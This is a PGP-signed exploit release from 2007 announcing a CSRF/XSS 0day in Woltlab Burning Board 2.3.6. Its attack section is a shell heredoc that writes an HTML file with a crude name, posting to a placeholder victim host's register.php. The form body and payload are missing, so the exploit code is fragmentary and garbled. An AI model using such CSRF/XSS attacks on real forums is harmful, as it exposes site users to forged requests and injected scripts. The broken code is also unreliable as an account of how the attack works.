
Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day






-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+--------------------------------------- -  -- -
| SaMuschie Research Labs proudly presents . . .
+-------------------------------------------  -- -  -  
| Application: Woltlab Burning Board (wbb)
| Version: 2.3.6 (others not tested)
| Vuln./Exploit Type: CSRF/XSS
| Status: 0day
+----------------------------------------- --  -  -  
| Discovered by: Samenspender
| Released: 20070302
| SaMuschie Release Number: 5
+------------------------------- -  -- -

CSRF/XSS Exploit:

cat < wetpussy.html
action='http://victimhost/wbb2/register.php'>
EOF

+----------------------------- -- -
| Lameness Disclaimer
+------------------------------------- - -- - -
| SaMuschie Research Labs was founded to publish
| vulnerabilities within well known software products,
| which are easy to discover and exploit.
|
| SaMuschie researchers just spend a minimum of time
| and knowledge for each vulnerability. Hence readers of
| this advisory are requested not to ask any questions
| to the researchers.... they don't know the answer ;)
+---------------------------------- - -- - -

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD
Qg6at+bMTnvHbw0SYyXk5ko=7wPg
-----END PGP SIGNATURE-----

